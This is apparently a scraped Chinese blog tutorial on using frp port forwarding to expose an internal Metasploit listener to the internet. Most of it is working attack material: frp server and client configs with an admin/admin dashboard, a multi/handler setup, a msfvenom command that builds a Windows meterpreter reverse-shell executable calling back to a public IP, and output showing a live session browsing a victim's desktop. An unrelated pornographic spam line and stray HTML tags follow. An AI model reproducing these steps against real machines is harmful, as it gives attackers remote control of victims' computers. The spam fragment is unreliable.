<td id="aqqih"></td>

<dd id="aqqih"></dd>
  1. <span id="aqqih"></span>
  2. <ol id="aqqih"></ol>

    內網Metasploit映射到外網的方法是什么

    這篇文章主要講解了“內網Metasploit映射到外網的方法是什么”,文中的講解內容簡單清晰,易于學習與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學習“內網Metasploit映射到外網的方法是什么”吧!

    下載frp

    找到最新的releases下載,系統版本自行確認。

    下載方法:

    wget?https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gz
    tar?zxvf?frp_0.16.1_linux_amd64.tar.gz?
    cd?frp_0.16.1_linux_amd64

    公網服務器配置:

    修改配置文件:

    [yuyongxr@instance-2?frp_0.16.1_linux_amd64]$?vim?frps.ini?
    [common]
    bind_port?=?7000
    dashboard_port?=?7500
    dashboard_user?=?admin
    dashboard_pwd?=?admin

    啟動服務:

    [yuyongxr@instance-2?frp_0.16.1_linux_amd64]$?nohup?./frps?-c?frps.ini?>?log.txt?&

    kali linux 配置:

    修改配置文件:

    kali@kali:~/frp_0.16.1_linux_amd64$?vim?frpc.ini?
    [common]
    server_addr?=?xx.xx.xx.xx
    server_port?=?7000
    [msf]
    type?=?tcp
    local_ip?=?127.0.0.1
    local_port?=?6666
    remote_port?=?4446

    啟動服務:

    kali@kali:~/frp_0.16.1_linux_amd64$?nohup?./frpc?-c?frpc.ini?>?log.txt?&

    metasploit配置:

    msf5?>?use?exploit/multi/handler?
    msf5?exploit(multi/handler)?>?set?payload?windows/x64/meterpreter/reverse_tcp
    payload?=>?windows/x64/meterpreter/reverse_tcp
    msf5?exploit(multi/handler)?>?set?lhost?127.0.0.1
    lhost?=>?127.0.0.1
    msf5?exploit(multi/handler)?>?set?lport?6666
    lport?=>?6666

    生成payload文件:

    e2a5e@kali:~$?msfvenom?-p?windows/x64/meterpreter/reverse_tcp?lhost=34.80.29.48?lport=4446?-f?exe?-o?test.exe
    [-]?No?platform?was?selected,?choosing?Msf::Module::Platform::Windows?from?the?payload
    [-]?No?arch?selected,?selecting?arch:?x64?from?the?payload
    No?encoder?or?badchars?specified,?outputting?raw?payload
    Payload?size:?510?bytes
    Final?size?of?exe?file:?7168?bytes
    Saved?as:?test.exe

    執行payload文件,測試效果:

    msf5?exploit(multi/handler)?>?exploit?
    [!]?You?are?binding?to?a?loopback?address?by?setting?LHOST?to?127.0.0.1.?Did?you?want?ReverseListenerBindAddress?
    [*]?Started?reverse?TCP?handler?on?127.0.0.1:6666?
    [*]?Sending?stage?(206403?bytes)?to?127.0.0.1
    [*]?Meterpreter?session?1?opened?(127.0.0.1:6666?->?127.0.0.1:35992)?at?2019-09-03?17:05:39?+0800
    meterpreter?>?ls
    Listing:?C:\Users\win7\Desktop
    ==============================
    Mode??????????????Size??????Type??Last?modified??????????????Name
    ----??????????????----??????----??-------------??????????????----
    100666/rw-rw-rw-??2309??????fil???2019-08-30?11:12:41?+0800??Google?Chrome.lnk
    100777/rwxrwxrwx??10916080??fil???2019-08-30?11:57:01?+0800??PCHunter64.exe
    40777/rwxrwxrwx???0?????????dir???2019-09-03?16:12:02?+0800??PanDownload
    100666/rw-rw-rw-??282???????fil???2018-09-11?09:18:55?+0800??desktop.ini
    100777/rwxrwxrwx??7168??????fil???2019-09-03?16:39:18?+0800??test.exe
    meterpreter?>

    感謝各位的閱讀,以上就是“內網Metasploit映射到外網的方法是什么”的內容了,經過本文的學習后,相信大家對內網Metasploit映射到外網的方法是什么這一問題有了更深刻的體會,具體使用情況還需要大家實踐驗證。這里是蝸牛博客,小編將為大家推送更多相關知識點的文章,歡迎關注!

    免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:niceseo99@gmail.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

    評論

    日本韩欧美一级A片在线观看
    <td id="aqqih"></td>

    <dd id="aqqih"></dd>
    1. <span id="aqqih"></span>
    2. <ol id="aqqih"></ol>